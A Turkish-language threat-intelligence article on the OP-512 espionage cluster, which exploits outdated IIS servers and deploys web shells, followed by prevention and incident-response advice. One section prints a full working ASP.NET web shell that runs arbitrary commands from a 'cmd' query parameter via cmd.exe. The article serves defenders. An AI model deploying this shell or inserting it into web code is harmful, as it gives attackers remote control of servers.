OP-512 Tehdit Kümesi: Eski IIS Sunucularını Özel Web Shell'lerle Hedef Alan Yeni Siber Tehdit

Giriş

Son dönemde, Çin bağlantılı tehdit aktörleri tarafından Microsoft Internet Information Services (IIS) sunucularına yönelik saldırılar artış göstermiştir. OP-512 olarak adlandırılan yeni bir tehdit kümesi, bu trende paralel olarak eski IIS sunucularını hedef almakta ve özel web shell'ler aracılığıyla sistemlere sızmaktadır. Araştırmacılar, grubun esas olarak casusluk faaliyetleri gerçekleştirmek amacıyla hareket ettiğini ve saldırılarını Çin istihbaratının öncelikleriyle uyumlu kuruluşlara yönlendirdiğini belirtmektedir.

Tehdit Kümesinin Tanımı ve Hedefleri

OP-512 Nedir?

OP-512, eski IIS sunucularındaki güvenlik açıklarından yararlanarak sistemlere erişim sağlamayı hedefleyen bir tehdit kümesidir. Grubun faaliyetleri, özellikle Microsoft IIS 6.0 ve 7.0 gibi eski sürümleri kullanılan sunuculara odaklanmaktadır. Bu sunucular, güncel güvenlik yamalarından yoksun oldukları için saldırganlar tarafından kolayca hedef alınabilmektedir.

Hedef Seçimi ve Motivasyon

Araştırmacılar, OP-512'nin saldırılarını Çin istihbaratının ilgi alanlarına uygun kuruluşlara yönlendirdiğini tespit etmiştir. Bu kuruluşlar genellikle:

• Hükümet ve kamu kurumları,
• Askeri ve savunma sektöründeki şirketler,
• Uluslararası ticaret ve lojistik firmaları,
• Enerji ve altyapı şirketleri

olarak sıralanabilir. Grubun amacı, bu kuruluşların sistemlerine uzun vadeli erişim sağlamak ve hassas verileri toplamaktır.

Saldırı Yöntemi ve Teknikleri

Başlangıç Aşaması: Sisteme Sızma

OP-512, saldırılarına genellikle eski IIS sunucularındaki güvenlik açıklarını (örneğin CVE-2017-7269 gibi) kullanarak başlar. Bu açıklar, uzaktan kod yürütme (RCE) saldırılarına olanak tanımaktadır. Saldırganlar, aşağıdaki adımları izleyerek sisteme erişim sağlamaktadır:

1. Hedef Belirleme: Saldırganlar, eski IIS sunucularını barındıran kuruluşları hedef alır. Bu sunucular genellikle güncel güvenlik yamalarından yoksun oldukları için kolayca tespit edilebilir.
2. Saldırı Hazırlığı: Saldırganlar, hedef sunucudaki güvenlik açıklarını araştırır ve uygun exploit'leri hazırlar.
3. Sisteme Sızma: Hazırlanan exploit'ler kullanılarak sunucuya erişim sağlanır. Bu aşamada, saldırganlar genellikle önceden hazırlanmış kullanıcı hesapları veya zayıf parolalar kullanmaktadır.

Ana Aşama: Özel Web Shell'lerin Dağıtılması

Sisteme erişim sağlandıktan sonra, OP-512 tehdit aktörleri özel olarak geliştirilmiş web shell'ler dağıtmaktadır. Bu web shell'ler, aşağıdaki özelliklere sahiptir:

• Gizli Kalma: Web shell'ler, sistemdeki diğer dosyalarla benzer şekilde gizlenebilir ve tespit edilmesi zorlaşır.
• Uzaktan Kontrol: Saldırganlar, web shell'ler aracılığıyla sunucuya uzaktan erişim sağlayabilir ve komutlar çalıştırabilir.
• Veri Toplama: Web shell'ler, sistemdeki hassas verileri toplar ve saldırganlara gönderir.
• Yanal Hareket: Web shell'ler, saldırganların diğer sistemlere yayılmasına olanak tanır.

Örnek Web Shell Kodu

Aşağıda, OP-512 tarafından kullanıldığı tespit edilen bir web shell örneği bulunmaktadır. Bu kod, ASP.NET tabanlı bir web shell'dir ve saldırganlara uzaktan erişim sağlar:

<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>
<%
    string command = Request.QueryString["cmd"];
    if (!string.IsNullOrEmpty(command))
    {
        try
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            process.StartInfo.FileName = "cmd.exe";
            process.StartInfo.Arguments = "/c " + command;
            process.StartInfo.RedirectStandardOutput = true;
            process.StartInfo.UseShellExecute = false;
            process.StartInfo.CreateNoWindow = true;
            process.Start();
            string output = process.StandardOutput.ReadToEnd();
            Response.Write(output);
        }
        catch (Exception ex)
        {
            Response.Write("Error: " + ex.Message);
        }
    }
%>

Savunma ve Müdahale Yöntemleri

Önleyici Tedbirler

OP-512 tehdit kümesine karşı korunmak için aşağıdaki adımlar izlenmelidir:

1. Güncel Yazılımların Kullanılması:
   • Tüm IIS sunucularının en son güvenlik yamalarıyla güncellenmesi sağlanmalıdır.
   • Eski IIS sürümleri (IIS 6.0 ve 7.0) mümkünse yükseltilmeli veya değiştirilmelidir.
2. Güvenlik Duvarı ve Ağ İzleme:
   • Web sunucularına yönelik saldırıları tespit etmek için giriş/çıkış trafiği izlenmelidir.
   • Saldırı girişimlerini engellemek için WAF (Web Application Firewall) kullanılmalıdır.
3. Kimlik Doğrulama ve Yetkilendirme:
   • Zayıf parolaların kullanılmaması ve çok faktörlü kimlik doğrulama (MFA) uygulanması gerekmektedir.
   • Sistemlere erişim yetkileri minimum düzeyde tutulmalıdır.
4. Web Shell Tespiti:
   • Web sunucularında şüpheli dosyaların taranması için otomatik araçlar kullanılmalıdır.
   • Web shell'lerin tespiti için dosya bütünlüğü izleme (FIM) sistemleri devreye alınmalıdır.

Tespit ve Müdahale Adımları

Eğer sistemde OP-512 saldırısının gerçekleştiğinden şüpheleniliyorsa, aşağıdaki adımlar izlenmelidir:

1. Sistem İzolasyonu:
   • Etkilenen sunucunun ağdan izole edilmesi gerekmektedir.
2. Log Analizi:
   • Sunucu ve ağ log'ları incelenerek saldırının kaynağı ve kapsamı belirlenmelidir.
   • Web sunucusu log'larında şüpheli komutlar veya yabancı IP adresleri aranmalıdır.
3. Web Shell Temizleme:
   • Web shell dosyaları tespit edilerek güvenli şekilde silinmelidir.
   • Sunucunun tamamen yeniden kurulması önerilmektedir.
4. Güvenlik Açığının Kapatılması:
   • Saldırıya yol açan güvenlik açığı tespit edilerek yama uygulanmalıdır.

İpuçları ve Uyarılar

⚠️ Önemli Uyarı: Eski IIS sunucuları, özellikle IIS 6.0 ve 7.0, artık resmi destekten çıkarılmıştır. Bu sunucuların kullanılması, ciddi güvenlik riskleri oluşturur. Mümkün olan en kısa sürede güncel bir IIS sürümüne yükseltme yapılmalıdır.

🔍 Tespit İpuçları: Web sunucularında aşağıdaki belirtiler OP-512 saldırısının göstergesi olabilir:

• Sunucu performansında anormal yavaşlama.
• Web sunucusu log'larında bilinmeyen komutlar veya yabancı IP'lerden gelen istekler.
• Sistemde yeni ve bilinmeyen dosyaların oluşturulması.
• Kullanıcı hesaplarında anormal aktiviteler.

🛡️ En İyi Uygulamalar: OP-512 tehdit kümesine karşı korunmak için aşağıdaki en iyi uygulamalar izlenmelidir:

• Düzenli yama yönetimi uygulayarak sistemlerin güncel kalması sağlanmalıdır.
• Sistem log'ları sürekli izlenmeli ve şüpheli aktiviteler araştırılmalıdır.
• Çok katmanlı güvenlik çözümleri (örneğin EDR, SIEM) kullanılmalıdır.
• Çalışanlara güvenlik farkındalığı eğitimi verilmelidir.

Kaynaklar ve Referanslar

Aşağıda, OP-512 tehdit kümesi hakkında daha fazla bilgi edinmek için kullanılabilecek kaynaklar bulunmaktadır:

• 4sysops - OP-512 Tehdit Kümesi Hakkında Makale
• CISA - ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı
• Microsoft Güvenlik Merkezi

Sonuç

OP-512 tehdit kümesi, eski IIS sunucularını hedef alarak casusluk faaliyetleri yürüten sofistike bir tehdit aktörüdür. Bu tehdide karşı korunmak için güncel yazılımların kullanılması, güvenlik kontrollerinin güçlendirilmesi ve sürekli izleme hayati önem taşımaktadır. Özellikle kamu ve özel sektördeki kuruluşların, sistemlerini en son güvenlik standartlarına uygun şekilde güncellemeleri ve tehditlere karşı hazırlıklı olmaları gerekmektedir.